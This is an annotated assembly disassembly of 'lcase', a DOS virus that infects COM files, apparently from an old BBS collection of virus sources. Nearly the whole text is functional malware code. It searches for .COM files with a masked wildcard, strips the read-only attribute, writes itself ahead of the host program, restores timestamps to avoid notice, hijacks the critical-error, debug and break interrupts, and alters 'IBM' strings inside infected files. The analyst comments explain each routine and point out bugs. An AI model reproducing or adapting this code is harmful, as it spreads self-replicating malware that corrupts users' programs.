The Unsorted BBS Collection
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Assembly Source File
606 lines
page ,132
; name: lcase.vom
; program type: com/bin
; cpu type: 8086/8087
; program loaded at 0000:0100
; physical eof at 0000:0489
; program entry point at 0000:0100
fun segment
assume cs:fun,ds:fun,es:fun,ss:fun
; start of program
org 0100h
jmp short h_0112 ;skip this
db 08h,08h,02h,20h,1ah,00h,00h,00h ;0102 ... ....
db 0008h dup (00h) ;010a .
call h_013e ;call do_virus
jmp h_0438 ;go start infected file
h_0118 dw 0000h ;0118 ..
h_011a dw 0000h ;011a ..
h_011c dw 0556h ;oldint24ofs
h_011e dw 0bd2h ;oldint24seg
h_0120 dw 0782h ;exit_time
h_0122 dw 0005h ;handle
h_0124 dw 2cb5h ;highseg
h_0126 dw 2db5h ;psp_save_seg
h_0128 dw 2eb5h ;new_virus_seg
h_012a dw 1325h ;file_date
h_012c dw 65f6h ;file_time
h_012e dw 0029h ;infected_program_size
h_0130 dw 0360h ;virus_size
h_0132 db "JN#/-" ;wildcard_com (masked!)
; db '*.COM' ;unmasked!
db 00h ;0137
h_0138 dw 0020h ;attributes
h_013a dw 0460h ;virus_end
h_013c dw 0cebh ;after_virus
; do_virus
call h_03b0 ;call setup_virus
;NOTE: Will not return if DOS >= 3.0!
ret ;and done
; find_file_to_infect
call h_0198 ;call set_exit_time
call h_03f9 ;call find_first_com_file
jnae h_0168 ;error, we're done
call h_03b7 ;call check_com_size
jnae h_0173 ;no, try next file
call h_0293 ;call get_check_attributes
jnae h_0173 ;no, try next file
call h_017f ;call clear_read_only
jnae h_0168 ;no good, we're done
call h_02a8 ;call open_file
jnae h_0168 ;error, quit
call h_0235 ;call read_file_header
jnae h_0168 ;error, quit
call h_03df ;call check_infected
jnae h_0169 ;yes, try next file
ret ;else we're done
call h_01d6 ;call close_file
jnae h_0168 ;error, quit
call h_01b5 ;call reset_attributes
jnae h_0168 ;error, quit
call h_01a5 ;call check_exit_time
jnae h_0168 ;done, just quit
call h_03cc ;call find_next_com_file
jnae h_0168 ;error, quit
jmp short h_014a ;else check next file
; clear_read_only
mov cx,[h_0138] ;get attributes
and cx,-02h ;turn off read-only bit
cmp cx,[h_0138] ;was read-only set?
jz h_0196 ;no, skip this
mov dx,009eh ;ds:dx = name found in DTA
mov al,01h ;fn = set file attributes
mov ah,43h
int 21h ;call DOS
ret ;and done
clc ;flag OK
ret ;and done
; set_exit_time
xor ah,ah ;fn = get time-of-day
int 1ah ;call BIOS
mov ax,dx ;low word to ax
add ax,0012h ;plus 18 ticks (1 second)
mov [h_0120],ax ;set exit_time
ret ;and done
; check_exit_time
xor ah,ah ;fn = get time-of-day
int 1ah ;call BIOS
cmp dx,[h_0120] ;ticks vs exit_time
ja h_01b3 ;expired, we're done
cmp al,00h ;next day?
jz h_0196 ;return not expired
stc ;flag exipred
ret ;and done
; reset_attributes
mov cx,[h_0138] ;get attributes
mov dx,009eh ;ds:dx = name found in DTA
mov al,01h ;fn = set file attributes
mov ah,43h
int 21h ;call DOS
ret ;and done
; reset_file_time_date
mov al,01h ;subfn = set
mov bx,[h_0122] ;get handle
mov dx,[h_012a] ;get file_date
mov cx,[h_012c] ;and file_time
mov ah,57h ;fn = set file time/date
int 21h ;call DOS
ret ;and done
; close_file
mov bx,[h_0122] ;get handle
mov ah,3eh ;fn = close file
int 21h ;call DOS
ret ;and done
; come here from setup_virus_env if DOS >= 3.0!
call h_0403 ;call mask_wildcard_com
call h_0142 ;call find_file_to_infect
pushf ;save return flags
call h_0403 ;call mask_wildcard_com
popf ;restore return flags
jnae h_0212 ;error, we're done
call h_02b9 ;call get_file_time_date
jnae h_0212 ;error, quit
call h_024b ;call read_rest_of_program
jnae h_0212 ;error, quit
call h_0273 ;call write_virus
jnae h_0212 ;error, quit
call h_035a ;call de-emphasize_ibm
call h_0345 ;call attach_infected_file
jnae h_0212 ;error, quit
call h_01c3 ;call reset_file_time_date
jnae h_0212 ;error, quit
call h_01d6 ;call close_file
jnae h_0212 ;error, quit
call h_01b5 ;call reset_attributes
jnae h_0212 ;error, DO NOTHING!
ret ;and done
; save_psp
mov es,[h_0126] ;get psp_save_seg
xor si,si ;ds:si = our PSP
xor di,di ;eS:di = save area
mov cx,0100h ;PSP size
cld ;up!
repz movsb ;save the PSP
ret ;and done
; restore_psp
push ds ;current seg
pop es ;to es
push ds ;save our ds
mov ds,[h_0126] ;get psp_save_seg
xor si,si ;ds:si = saved PSP
xor di,di ;es:di = our PSP
mov cx,0100h ;PSP size
cld ;up!
repz movsb ;restore the PSP
pop ds ;restore our DS
ret ;and done
; read_file_header
mov bx,[h_0122] ;get handle
mov cx,0012h ;size to read
xor dx,dx ;ofs 0
mov ds,[h_0128] ;in new_virus_seg
mov ah,3fh ;fn = read file
int 21h ;call DOS
push cs ;current segment
pop ds ;to ds
jnae h_0212 ;error, quit
ret ;else return anyway!
; read_rest_of_program
mov bx,[h_0122] ;get handle
mov di,009ah ;ptr to size (low) in DTA
mov cx,[di] ;get size (low)
mov dx,0012h ;dx = signature size
sub cx,dx ;remainder to read
;BUG: If file size < 12h, will be a
; BIG read!
mov ds,[h_0128] ;new_virus_seg
mov ah,3fh ;fn = read file
int 21h ;call DOS
push cs ;current segment
pop ds ;to ds
jnae h_0212 ;error, quit
add ax,0012h ;read + header size
mov di,009ah ;ptr to size (low)
cmp ax,[di] ;all bytes read?
jnz h_02b7 ;no, an error!
mov [h_012e],ax ;save infected_file_size
ret ;and done
; write_virus
xor al,al ;mode = BOF+CX:DX
xor cx,cx ;cx:dx = 0
xor dx,dx
mov bx,[h_0122] ;get handle
mov ah,42h ;fn = lseek
int 21h ;call DOS
jnae h_02a7 ;error, quit
mov bx,[h_0122] ;get handle
mov dx,offset h_0100 ;ds:dx = this virus
mov cx,[h_0130] ;get virus_size
mov ah,40h ;fn = write to file
int 21h ;call DOS
ret ;and done
; get_check_attributes
mov dx,009eh ;ds:dx = name found in DTA
xor al,al
mov ah,43h ;fn = get file attributes
int 21h ;call DOS
jnae h_02a7 ;error, quit
mov [h_0138],cx ;save attributes
and cx,+06h ;check SYSTEM, HIDDEN
jnz h_02b7 ;set, return bad flags
ret ;and done
; open_file
mov dx,009eh ;ds:dx = name found in DTA
mov al,02h ;fn = open file for read/write
mov ah,3dh
int 21h ;call DOS
jnae h_02a7 ;error, quit
mov [h_0122],ax ;save handle
ret ;and done
stc ;flag error
ret ;and done
; get_file_time_date
xor al,al ;subfn = get
mov bx,[h_0122] ;get handle
mov ah,57h ;fn = get file time/date
int 21h ;call DOS
jnae h_02a7 ;error, quit
mov [h_012a],dx ;save file_date
mov [h_012c],cx ;and file_time
ret ;and done
; setup_virus_env
mov ax,ds ;get our segment
add ax,2000h ;plus 128K
mov [h_0124],ax ;set highseg
add ax,0100h ;plus another 4K
mov [h_0126],ax ;set psp_save_seg
add ax,0100h ;plus another 4K
mov [h_0128],ax ;set new_virus_seg
mov ax,offset h_045d+0010h ;end of virus plus pad (046dh)
and ax,0fff0h ;mask to paragarph
mov [h_013a],ax ;save virus_end
sub ax,0100h ;minus PSP size
mov [h_0130],ax ;save virus_size
mov cl,04h ;for 4-bit shift
shr ax,cl ;bytes to paras
mov cx,cs ;get our segment
add ax,cx ;plus virus paras
mov [h_013c],ax ;set after_virus
call h_0213 ;call save_psp
call h_030e ;call get_set_int24
call h_03a9 ;call check_dos_version
jnae h_030d ;no, just continue
pop cx ;cleanup h_03b6 return address
pop ax ;cleanup h_0141 return address
mov ax,offset h_01df ;ofs of continuation IP
push ax ;to stack
ret ;and done with this routine
; get_set_int24
mov ax,3524h ;fn = get INT 24 vector
int 21h ;call DOS
mov [h_011c],bx ;save oldint24ofs
mov [h_011e],es ;and oldint24seg
mov ax,2524h ;fn = set INT 24 vector
mov dx,offset h_0334 ;ds:dx = INT24HERE
int 21h ;call DOS
ret ;and done
; restore_int24
mov ax,2524h ;fn = set INT 24 vector
push ds ;save our ds
mov dx,[h_011c] ;get oldint24ofs
mov ds,[h_011e] ;and oldint24seg
int 21h ;call DOS
pop ds ;restore our ds
ret ;and done
; int24here
pop ax ;cleanup return IP
pop ax ;and return CS
popf ;and return flags
pop ax ;retore saved regs
pop bx
pop cx
pop dx
pop si
pop di
pop bp
pop ds
pop es
;NOTE: Won't work on Novell 3.10A-E!
mov ax,000eh ;error = RESERVED
stc ;flag error
iret ;continue program
;BUG: IRET will pop flags, destroying the
; error flag of the STC!
; attach_infected_file
mov bx,[h_0122] ;get handle
mov cx,[h_012e] ;get infected_program_size
xor dx,dx ;ofs of saved program
push ds ;save our ds
mov ds,[h_0128] ;get new_virus_seg
mov ah,40h ;fn = write to file
int 21h ;call DOS
pop ds ;restore our ds
ret ;and done
; de-emphasize_ibm
mov cx,[h_012e] ;get infected_program_size
xor di,di ;offset into program
push ds ;save our ds
mov ds,[h_0128] ;get new_virus_seg
mov al,4dh ;3rd char of IBM ('M')
mov ah,49h ;1st char of IBM ('I')
mov bh,42h ;2nd char of IBM ('B')
inc di ;next byte in program
cmp ah,[di] ;1st char of IBM?
jnz h_0385 ;no, do next byte
cmp bh,[di+01h] ;2nd char of IBM?
jnz h_0385 ;no, do next byte
cmp al,[di+02h] ;3rd char of IBM?
jnz h_0385 ;no, do next byte
mov byte ptr [di+02h],6dh ;replace 'M' with 'm'
mov byte ptr [di],69h ;replace 'I' with 'i'
mov byte ptr [di+01h],62h ;replace 'B' with 'b'
loop h_036b ;do all bytes
pop ds ;restore our ds
ret ;and done
; set_trash_int
mov dx,offset h_0392 ;ofs of trash_int
; set_int
mov ah,25h ;fn = set INT vector
int 21h ;call DOS
ret ;and done
; null_iret
iret ;and done
; trash_int
jmp short h_0389 ;goto set_trash_int
; set_null_int
mov dx,offset h_0391 ;ds:dx = null_iret
jmp short h_038c ;goto set_int
; set_ints_23_19_1b
mov al,23h ;interrupt # = 23h
call h_0389 ;call set_trash_int
mov al,19h ;interrupt # = 19h
call h_0389 ;call set_trash_int
mov al,1bh ;interrupt # = 1bh
call h_0389 ;call set_trash_int
ret ;and done
; check_dos_version
mov ah,30h ;fn = get DOS version
int 21h ;call DOS
cmp al,03h ;at least 3?
ret ;and return the flags
; setup_virus
call h_03d1 ;call take_bothersome_ints
call h_02ce ;call setup_virus_env
;NOTE: Will not return if DOS >= 3.0!
ret ;and done
; check_com_size
mov di,009ch ;di = high word of name
cmp word ptr [di],+00h ;file > 64K?
jnz h_03c8 ;yes, flag we're done
mov di,009ah ;ptr to size (low) in DTA
cmp word ptr [di],0d000h ;too big?
jnae h_03ca ;no, flag OK
stc ;flag ignore this file
ret ;and done
clc ;flag OK to infect
ret ;and done
; find_next_com_file
mov ah,4fh ;fn = find next matching file
int 21h ;call DOS
ret ;and done
; take_bothersome_ints
mov al,03h ;interrupt # = 3
call h_0394 ;call set_null_int
mov al,01h ;interrupt # = 1
call h_0394 ;call set_null_int
call h_0399 ;call set_ints_23_19_1b
ret ;and done
; check_infected
mov cx,0012h ;size to check
mov es,[h_0128] ;new_virus_seg
mov si,0000h ;si = program header
mov di,offset h_0100 ;di = this virus
mov al,es:[si] ;get header byte
cmp al,[di] ;our byte?
jnz h_03ca ;no, flag OK to infect
inc si ;update header pointer
inc di ;and virus pointer
loop h_03ec ;do all bytes
jmp short h_03c8 ;the same, flag infected
; find_first_com_file
xor cx,cx ;attributes = NONE
mov dx,offset h_0132 ;ds:dx = wildcard_com
mov ah,4eh ;fn = find first matching file
int 21h ;call DOS
ret ;and done
; mask_wildcard_com
mov dx,offset h_0132 ;ds:dx = wildcard_com
mov di,dx ;ofs to addressing reg
mov cx,0005h ;len of string
xor byte ptr [di],60h ;mask/unmask byte
inc di ;next byte
loop h_040b ;do all bytes
ret ;and done
; setup_startup_routine
mov es,[h_0124] ;get highseg
mov di,0000h ;es:di = free memory
mov si,offset h_0427 ;ds:si = startup_routine
mov cx,offset h_0437 ;end of startup_routine
sub cx,offset h_0427 ;get size of startup_routine
cld ;up!
repz movsb ;copy startup_routine
ret ;and done
; startup_routine
; NOTE: This routine is run from HIGHSEG:0000h
mov di,offset h_0100 ;normal COM start
mov si,[h_013a] ;get virus_end (loc of
;infected file!)
mov cx,0d000h ;max size
shr cx,1 ;to words
cld ;up!
repz movsw ;move program into place
retf ;run infected file
h_0437 db 00h ;end of startup_routine
; come here to run infected file
call h_0324 ;call restore_int24
call h_0222 ;call restore_psp
call h_0412 ;call setup_startup_routine
mov word ptr [h_0118],0000h ;ofs of startup_routine
mov es,[h_0124] ;get highseg
mov [h_011a],es ;save for JMPF
push cs ;current segment
pop ds ;to ds
push cs ;and again
pop es ;to es
push cs ;current seg to stack
mov cx,offset h_0100 ;normal COM start
push cx ;to stack
jmp dword ptr cs:[h_0118] ;goto startup_routine
h_045d equ $
db 90h,90h,90h ;045d ...
; the infected file follows
h_0460 db 0ebh,1eh ;0460 ..
db "This is a t"
; db 54h,68h,69h,73h,20h,69h,73h,20h ;0462
; db 61h,20h,74h ;046a
h_046d db "iny COM program."
; db 69h,6eh,79h,20h,43h,4fh,4dh,20h ;046d
; db 70h,72h,6fh,67h,72h,61h,6dh,2eh ;0475
db 0dh,0ah ;047d
db "$"
; db 24h ;047f
db 0bah,02h,01h,0b4h,09h,0cdh,21h,0cdh ;0480 ......!.
db 20h ;0488
fun ends
end h_0100